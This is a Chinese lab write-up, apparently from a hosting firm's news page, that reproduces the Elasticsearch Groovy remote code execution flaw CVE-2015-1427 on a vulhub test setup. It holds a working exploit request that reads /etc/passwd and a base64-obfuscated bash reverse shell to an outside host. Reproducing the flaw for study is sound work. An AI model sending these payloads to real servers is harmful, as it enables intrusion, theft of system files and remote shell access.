如何分析ElasticSearch Groovy远程代码执行漏洞CVE-2015-1427复现

如何分析ElasticSearch Groovy远程代码执行漏洞CVE-2015-1427复现

本篇文章给大家分享的是有关如何分析ElasticSearch Groovy远程代码执行漏洞CVE-2015-1427复现，小编觉得挺实用的，因此分享给大家学习，希望大家阅读完这篇文章后可以有所收获，话不多说，跟着小编一起来看看吧。

Elasticsearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎，基于RESTful web接口。Elasticsearch是用Java语言开发的，并作为Apache许可条款下的开放源码发布，是一种流行的企业级搜索引擎。

2014年爆出过一个远程代码执行漏洞(CVE-2014-3120),该漏洞产生原因是由于ElasticSearch使用的脚本引擎支持脚本代码MVEL作为表达式进行数据操作，攻击者可以通过MVEL构造执行任意java代码。

后来脚本语言引擎换成了Groovy，并且加入了沙盒进行控制，危险的代码会被拦截，结果这次由于沙盒限制的不严格，导致远程代码执行。

漏洞影响范围:Elasticsearch 1.3.0-1.3.7 | 1.4.0-1.4.2

本文仅作漏洞复现记录与实现，利用流程如下:

一、漏洞环境搭建

本文漏洞环境采用vulhub搭建，执行以下命令开启环境

cd /elasticsearch/CVE-2015-1427    docker-compose build    docker-compose up -d

执行完毕后访问9200端口，显示如下:

漏洞链接:http://192.168.101.152:9200/

二、漏洞复现

利用该漏洞首先需要ElasticSearch存在至少一条数据，发送以下数据包添加数据

POST /website/blog/ HTTP/1.1  Host: 192.168.101.152:9200  Content-Length: 21    {  "name": "test"  }

返回201表示添加成功，然后发送以下数据包执行命令

POST /_search?pretty HTTP/1.1  Host: 192.168.101.152:9200  Content-Length: 410    {"size":1,"script_fields": {"test#": {"script":"java.lang.Math.class.forName("java.io.BufferedReader").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName("java.io.InputStreamReader").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("cat /etc/passwd").getInputStream())).readLines()","lang": "groovy"}}}

命令执行成功

为了方便将shell反弹至服务器上

服务器执行nc -lvvp 监听端口

之后执行以下命令反弹shell

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzg4NDEgMD4mMQ==}|{base64,-d}|{bash,-i}

成功反弹

以上就是如何分析ElasticSearch Groovy远程代码执行漏洞CVE-2015-1427复现，小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注高防服务器网行业资讯频道。

[微信提示：高防服务器能助您降低 IT 成本，提升运维效率，使您更专注于核心业务创新。

[图文来源于网络，不代表本站立场，如有侵权，请联系高防服务器网删除]
[